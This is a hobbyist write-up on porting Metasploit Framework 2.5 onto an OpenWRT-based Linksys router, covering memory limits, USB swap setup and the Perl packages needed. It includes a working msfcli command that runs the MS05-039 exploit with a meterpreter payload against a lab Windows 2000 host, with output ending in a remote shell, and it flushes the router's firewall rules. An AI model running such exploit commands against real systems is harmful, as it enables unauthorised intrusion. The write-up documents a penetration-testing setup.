OpenWRT vs Metasploit

Getting Metasploit to run on a Linksys Router

Mati Aharoni - muts (-@-) offensive-security.com
http://www.offensive-security.com

[+] The Story

I recently got a WRTSL54GS - one of the sexier models Linksys has to offer, with a USB connector. Being the inquisitive, gung-ho persona that I am, I decided to muck around with it, and see what interesting features it has to offer. I read some very interesting OpenWRT howto's, such as connecting a cellular phone to the router, and dialing out via grps. Also, I found an interesting firmware customisation at http://www.hackerpimps.com/ - which is a "backtrack" equivalent for the wrt54gs. Several precompiled exploits come with that firmware - which got me thinking... My goal was to get Metasploit Framework 2.5 running under the Linksys router. And so the journey began...

[+] The Problems

I started with installing all the perl modules required for framework, just to be greeted with a nasty +++ killed by SIGKILL +++.

root@OpenWrt:~/framework-2.5# ./msfcli
Killed

Every time I would try running ./msfcli dmesg showed:

__alloc_pages: 0-order allocation failed (gfp=0x1d2/0)
__alloc_pages: 0-order allocation failed (gfp=0xf0/0)
VM: killing process ./msfcli

[+] The Solutions

I was told by some nice people in #openwrt that this is due to RAM limitations. One way of overcoming this would be setting up swap space for the openwrt....enter USB connection. By following the UsbStorageHowto (http://wiki.openwrt.org/UsbStorageHowto) I managed to get the USB disk on key (2 GB) recognised, and created swap space on it.

[+] The PwN

A few packages later, msfcli actually responded, and produced a shell on an unpatched win2k machine.

root@OpenWrt:~/framework-2.5# ./msfcli ms05_039_pnp RHOST=192.168.1.196 \
> PAYLOAD=win32_bind_meterpreter TARGET=0 E
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.1.1:1103 <-> 192.168.1.196:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>

[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Process
loadlib: Loading library from 'ext436067.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 456.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1. 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

To my suprise, mfsweb also worked, with a little tweaking of the listening interface:

# Configuration defaults...
my %config      =
(
        'BindAddr'      => '127.0.0.1', <-- Changed to 192.168.1.1
        'BindPort'      => 55555,
        'LogFile'       => '-',


root@OpenWrt:~/framework-2.5# ./msfweb
+----=[ Metasploit Framework Web Interface (192.168.1.1:55555)

[+] The CookBook

The following is my setup for this whole thing to work. I am not an OpenWRT expert, nor a linux expert. There may be some redundant or otherwise usless steps here. Any comments are welcome.
* I started by disabling iptables (danger!):

iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F

* I added the backports repository to ipkg.conf:

src backports http://downloads.openwrt.org/backports/rc5

* Then, I followed the USB Storage howto, to get the USB stick recognised:

http://wiki.openwrt.org/UsbStorageHowto

* Installed several packages needed for disk management:

ipkg install swap-utils
ipkg install fdisk

* Repartitioned the USB stick, and made a swap Filesystem:

mkswap /dev/scsi/host0/bus0/target0/lun0/disc
swapon /dev/scsi/host0/bus0/target0/lun0/disc

* Downloaded Metasploit Framework:

wget http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

* Downloaded and installed the required perl packages:

libgcc_3.4.4-8_mipsel.ipk
perl_5.8.7-1_mipsel.ipk
perlbase-autoloader_5.8.7-1_mipsel.ipk
perlbase-base_5.8.7-1_mipsel.ipk
perlbase-byteloader_5.8.7-1_mipsel.ipk
perlbase-bytes_5.8.7-1_mipsel.ipk
perlbase-charnames_5.8.7-1_mipsel.ipk
perlbase-class_5.8.7-1_mipsel.ipk
perlbase-config_5.8.7-1_mipsel.ipk
perlbase-cwd_5.8.7-1_mipsel.ipk
perlbase-data_5.8.7-1_mipsel.ipk
perlbase-digest_5.8.7-1_mipsel.ipk
perlbase-dynaloader_5.8.7-1_mipsel.ipk
perlbase-errno_5.8.7-1_mipsel.ipk
perlbase-essential_5.8.7-1_mipsel.ipk
perlbase-extutils_5.8.7-1_mipsel.ipk
perlbase-findbin_5.8.7-1_mipsel.ipk
perlbase-getcwd_5.8.7-1_mipsel.ipk
perlbase-hostname_5.8.7-1_mipsel.ipk
perlbase-i18n_5.8.7-1_mipsel.ipk
perlbase-ipc_5.8.7-1_mipsel.ipk
perlbase-posix_5.8.7-1_mipsel.ipk
perlbase-socket_5.8.7-1_mipsel.ipk
perlbase-sys_5.8.7-1_mipsel.ipk
perlbase-utf8_5.8.7-1_mipsel.ipk
perlbase-xsloader_5.8.7-1_mipsel.ipk
perlbase-file_5.8.7-1_mipsel.ipk
perlbase-io_5.8.7-1_mipsel.ipk
perlbase-symbol_5.8.7-1_mipsel.ipk
perlbase-selectsaver_5.8.7-1_mipsel.ipk
perlbase-getopt_5.8.7-1_mipsel.ipk
perlbase-integer_5.8.7-1_mipsel.ipk

A final reboot was preformed to get all the kernel modules in place, although this was not necessary. insmod would have worked just fine.

[+] Notes:

Everything seems to be working fine, as far as I tested. Msfcli is a bit slow to respond, and as can be expected, Msfweb is even slower...but..It WORKS!

OpenWRT vs Metasploit

Free Projects